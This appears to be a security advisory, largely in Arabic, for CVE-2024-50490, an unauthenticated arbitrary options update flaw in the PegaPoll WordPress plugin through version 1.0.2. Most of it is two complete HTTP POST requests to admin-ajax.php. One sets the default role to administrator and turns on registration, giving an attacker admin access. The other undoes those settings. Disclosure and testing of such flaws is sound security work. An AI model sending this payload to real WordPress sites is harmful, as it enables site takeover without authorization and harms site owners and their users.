
PegaPoll <= 1.0.2 - تحديث غير مصادق للخيارات التعسفية
PegaPoll <= 1.0.2 - تحديث غير مصرح به للخيارات التعسفية
إضافة PegaPoll لـ WordPress معرضة لتعديل غير مصرح به للبيانات يمكن أن يؤدي إلى تصعيد الامتيازات بسبب عدم وجود فحص للصلاحيات في جميع الإصدارات حتى 1.0.2. هذا يسمح للمهاجمين غير المصادقين بتحديث خيارات تعسفية على موقع WordPress. يمكن استغلال هذا لتحديث الدور الافتراضي للتسجيل إلى مدير وتمكين تسجيل المستخدمين للمهاجمين للحصول على وصول إداري إلى موقع ضعيف.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50490
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: pegapoll
تمكين التسجيل وجعل المستخدم الجديد مديرًا افتراضيًا
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Origin: http://kubernetes.docker.internal
Connection: keep-alive
action=update_all_options&options[default_role]=administrator&options[users_can_register]=1
العودة لتعطيل تسجيل المستخدمين وجعل المستخدم مشتركًا
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Origin: http://kubernetes.docker.internal
Connection: keep-alive
action=update_all_options&options[default_role]=subscriber&options[users_can_register]=0